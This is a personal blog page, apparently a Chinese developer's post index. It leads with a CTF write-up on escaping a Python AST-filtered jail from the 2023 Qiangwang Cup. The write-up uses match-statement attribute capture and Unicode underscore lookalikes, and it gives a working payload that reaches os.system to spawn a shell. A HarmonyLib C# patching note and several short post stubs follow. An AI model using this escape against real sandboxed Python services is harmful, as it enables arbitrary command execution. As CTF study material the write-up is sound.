记一道很抽象的 PyJail

January 6, 2024 · 4 min read

CTF 小白，本着重在参与的精神想进队里摸鱼，浪费了一个下午，没想到真的打出了点输出，遂记录之。

题源：2023 强网杯 - Pyjail ! It's myAST !!!!

#!/bin/python3.11
import ast

BAD_ATS = {
  ast.Attribute,
  ast.Subscript,
  ast.comprehension,
  ast.Delete,
  ast.Try,
  ast.For,
  ast.ExceptHandler,
  ast.With,
  ast.Import,
  ast.ImportFrom,
  ast.Assign,
  ast.AnnAssign,
  ast.Constant,
  ast.ClassDef,
  ast.AsyncFunctionDef,
}

BUILTINS = {
    "bool": bool,
    "set": set,
    "tuple": tuple,
    "round": round,
    "map": map,
    "len": len,
    "bytes": bytes,
    "dict": dict,
    "str": str,
    "all": all,
    "range": range,
    "enumerate": enumerate,
    "int": int,
    "zip": zip,
    "filter": filter,
    "list": list,
    "max": max,
    "float": float,
    "divmod": divmod,
    "unicode": str,
    "min": min,
    "range": range,
    "sum": sum,
    "abs": abs,
    "sorted": sorted,
    "repr": repr,
    "object": object,
    "isinstance": isinstance,
}


def is_safe(code):
  if type(code) is str and "__" in code:
    return False

  for x in ast.walk(compile(code, "<QWB7th>", "exec", flags=ast.PyCF_ONLY_AST)):
    if type(x) in BAD_ATS:
      print(x)
      return False

  return True


if __name__ == "__main__":
  user_input = input("Can u input your code to escape > ")

  if is_safe(user_input) and len(user_input) < 1800:
    exec(user_input, {"__builtins__": BUILTINS}, {})

分析

语法树级别的过滤 & 命名空间限制，目标是 getshell。

由于命名空间限制，获得能 getshell 的函数只能靠继承链，然而语法树又非常重量级地过滤了 Attribute 与 Subscript 操作，想利用继承链必须同时绕过这两个限制。

解法

Trick 1: Match

解此题的突破口在于远端 Python 的版本。自 3.10 起 Python 新增了模式匹配操作，其对应的树节点是 Match，正好不会被过滤。

利用模式匹配，我们可以捕捉一个实例任何的属性：

def get(d, key):
    match d:
        case dict(get=func):
            return func

get(dict) == dict.get

使用这个 trick，就可以将 Attribute 与 Subscript 全部替换成 Match 操作，绕过过滤。

但还有一个问题。

继承链的利用少不了双下划线，然而这题却很鸡贼的也检测了双下划线。因此需要第二个 trick。

Trick 2: Unicode

Unicode 等价性（Unicode equivalence）是为和许多现存的标准能够兼容，Unicode（统一码）包含了许多特殊字符。在这些字符中，有些在功能上会和其它字符或字符序列等价。因此，Unicode 将一些码位序列定义成相等的。Wikipedia

当 Python 解释代码时，它会首先使用名为 NFKC 的规范化算法对 Unicode 进行等价，这种算法可以将一些视觉上相似的 Unicode 字符统一为一个标准形式。

import unicodedata
for i in range(0x000000, 0x10FFFF):
    ch2 = chr(i)
    if '_' == unicodedata.normalize('NFKC', ch2):
        print(ch2)

上述脚本可以找到所有与下划线 _ 等价的 Unicode 字符，它们在解释器眼中是同一个字符：︳︴﹍﹎﹏＿

match str():
    case (_﹍class﹍_=clazz):
        ...

于是可以绕过。

Payload

一个可用的 Payload

def s(b):
    match bytes([b]):
        case bytes(decode=func):
            return func()
while o := len([min]):
    while t := len([min, min]):
        while th := len([min, min, min]):
            while fo := len([min, min, min, min]):
                while ten := len([min, min, min, min, min, min, min, min, min, min]):
                    match str():
                        case object(_﹍class﹍_=clazz):
                            match clazz:
                                case object(_﹍bases﹍_=bases):
                                    match bases:
                                        case object(_﹍getitem﹍_=gb):
                                            match gb(len([])):
                                                case object(_﹍subclasses﹍_=subclasses):
                                                    match subclasses():
                                                        case object(_﹍getitem﹍_=g2):
                                                            match g2(ten * ten + t*t):
                                                                case object(load_module=lm):
                                                                    match lm(s(ten*(ten+o)+o)+s(ten*(ten+o)+fo+o)):
                                                                        case object(system=sys):
                                                                            sys(s(ten*(ten+o)+fo+o)+s(ten*ten+t*t))

HarmonyLib 笔记

August 1, 2023 · 4 min read

概念

https://github.com/pardeike/Harmony

C# 的运行时库。

Harmony 提供了大量高阶 API 用来非常方便地打补丁，简单易上手。

补丁分三种：

Prefix
Postfix
Transpiler

基础用法

public class TargetClass {
    public int TargetMethod(int i)
    {
        return i + 100;
    }
}

[HarmonyPatch(typeof(TargetClass))]
[HarmonyPatch(nameof(TargetClass.TargetMethod))]
public static class Patch_Something
{
    public static void Postfix(ref int __result)
    {
        if (__result > 0)
        {
            result = 0;
        }
    }
}

只需为补丁类标记 HarmonyPatch 特性，Harmony 即可自动收集。

再在任意流程处执行补丁（此处以游戏 RimWorld 为例）：

[StaticConstructorOnStartup]
public static class Patch_Apply
{
    static Patch_Apply {
        new Harmony("patcher.id").PatchAll();
    }
}

变体

Harmony 的特性标记使用方法灵活，上例可以有另一种写法：

[HarmonyPatch(typeof(TargetClass), nameof(TargetClass.TargetMethod))]
public static class Patch_Something
{
    [HarmonyPrefix]
    public static void Method(ref __result)
    {
        if (__result > 0)
        {
            result = 0;
        }
    }
}

具体参见 https://harmony.pardeike.net/articles/annotations.html

格式

补丁类必须为静态类。

bool Prefix(...);

Prefix 在原方法之前执行，若返回 true 则跳过原方法。

在 Prefix 中仍可更改原方法的返回值，详见下一节。

void Postfix(...);

Postfix 在原方法之后执行。

IEnumerable<CodeInstruction> Transpiler(IEnumerable<CodeInstruction> instructions);

Transpiler 直接修改原方法的 IL Code。

特殊参数

Prefix 与 Postfix 补丁有一些预设的特殊参数：

param	desc
`__instance`	目标类的实例，若目标类为静态类则为 `null`
`__result`	目标方法的返回值，可通过 `ref` 修改
`__state`	状态寄存，可在 Prefix 与 Postfix 间传递
`NAME`	目标方法的同名传入参数
`___NAME`	目标类的同名私有属性

精确制导

指定入参

void Method(char a, int b);

[HarmonyPatch("Method", new Type[]{ typeof(char), typeof(int) })]

指定入参 +

void Method(int a, ref int b, out int c);

[HarmonyPatch(
    "Method",
    new Type[]{ typeof(int), typeof(int), typeof(int) },
    new ArgumentType[]{
        ArgumentType.Normal,
        ArgumentType.Ref,
        ArgumentType.Out
    }
)]

MethodType

[HarmonyPatch("Method", MethodType.Getter)] // get_
[HarmonyPatch("Method", MethodType.Setter)] // set_
[HarmonyPatch("Method", MethodType.Constructor)] // ctor
[HarmonyPatch("Method", MethodType.StaticConstructor)]
[HarmonyPatch("Method", MethodType.Enumerator)] // .MoveNext

Postfix pass through

补丁无法通过 ref 修改 IEnumerable 类型的返回值，此时需要用到 postfix pass through patch。

具体使用方法为令 Postfix 补丁的第一个入参与出参均与函数出参类型相同，则 Harmony 会自动将其识别为 pass through patch。

动态补丁

[HarmonyPatch]
public static class Patch_Dynamic {
    static MethodBase TargetMethod()
    {
        ...
    }
}

[StaticConstructorOnStartup]
public static class Patch_Apply
{
    static Patch_Apply {
        Harmony harmony = new Harmony("patcher.id");
        harmony.Patch(MethodBase, postfix: new HarmonyMethod(Postfix));
    }
}

执行顺序

[HarmonyPriority(Priority.HigherThanNormal)]
[HarmonyBefore("patcher.id")]
[HarmonyAfter("patcher.id")]

Reverse Patcher

反向 Patch 可以提取目标类的函数。某些情况下可以防止过多使用反射导致的性能问题。

用的不多，略过。

https://harmony.pardeike.net/articles/reverse-patching.html

耶，复活了

July 31, 2023 · One min read

堂堂复活！

Trailing Slash 杂谈

February 2, 2023 · 7 min read

关于 301 的悬案。

速通量子力学

October 31, 2022 · 17 min read

唏，可以和解吗？

由于考完了，没动力再写了，所以日后再补充

info

Migrated from old blog

Command Snippets

October 20, 2022 · 3 min read

info

Migrated from old blog

Docker 技巧杂记

October 20, 2022 · 6 min read

一些零零碎碎的要点

info

Migrated from old blog

CronJob 笔记

September 23, 2022 · 6 min read

写 cron in docker 时小小复习了一遍 cronjob，整理一下以便日后查阅

info

Migrated from old blog

Office

September 12, 2022 · 5 min read

也许是因为压死线赶作业，不幸追尾了 Office 激活过期日。微软提出的和解条件竟然是……

info

Migrated from old blog

博客搭建实录

September 10, 2022 · 9 min read

搭站踩过的坑。

info

Migrated from old blog

分析

解法

Trick 1: Match​

Trick 2: Unicode

Payload

概念​

基础用法​

变体​

格式​

特殊参数​

精确制导​

Postfix pass through​

动态补丁​

执行顺序​

Reverse Patcher​

Trick 1: Match

概念

基础用法

变体

格式

特殊参数

精确制导

Postfix pass through

动态补丁

执行顺序

Reverse Patcher